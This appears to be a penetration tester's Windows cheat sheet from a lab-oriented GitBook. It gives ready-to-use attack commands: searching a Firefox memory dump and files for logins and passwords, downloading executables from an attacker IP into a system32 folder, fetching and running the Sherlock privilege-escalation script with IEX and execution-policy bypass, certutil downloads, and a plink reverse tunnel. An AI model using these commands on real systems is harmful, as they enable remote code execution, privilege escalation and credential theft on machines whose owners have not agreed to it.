# Windows

{% tabs %}
{% tab title="Powershell" %}

### Searching 

```
Get-ChildItem -Path "C:\Users\Chase\Desktop\2104firefox.dmp" -Recurse -File | Select-String login 
```

### Download 

```
powershell.exe -exec bypass -command "Invoke-WebRequest 'http://10.10.14.18:8888/41020.exe' -OutFile 'C:\windows\system32\spool\drivers\color\41020.exe'" 
```

### Execution 

```
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.18:8888/Sherlock.ps1'); Find-AllVulns -Command 'start powershell.exe'" 
```

### Recurse List the access file 

```
gci  -recurse –include *.* | select Fullname 
```

![](https://firebasestorage.googleapis.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MHdTwldplFku-IlYazS%2Fuploads%2FK1YDC3hsMyOGJiK8c8rq%2Ffile.png?alt=media)
{% endtab %}

{% tab title="Command Line" %}
**Search file** 

```
dir abc.txt /s /p 
findstr /i /s "password" *.* 

#Answer the promot message with "y" 
cmd.exe /c echo y | plink.exe -ssh –l username –pw password –R 

```

**download a file**

certutil.exe - urlcache -split -f <http://ip/file> file&#x20;
{% endtab %}

{% tab title="Impacket" %}
{% embed url="<https://www.secureauth.com/labs/open-source-tools/impacket>" %}

{% endtab %}

{% tab title="PE Tools" %}
{% embed url="<https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe>" %}

{% embed url="<https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/>" %}

{% endtab %}
{% endtabs %}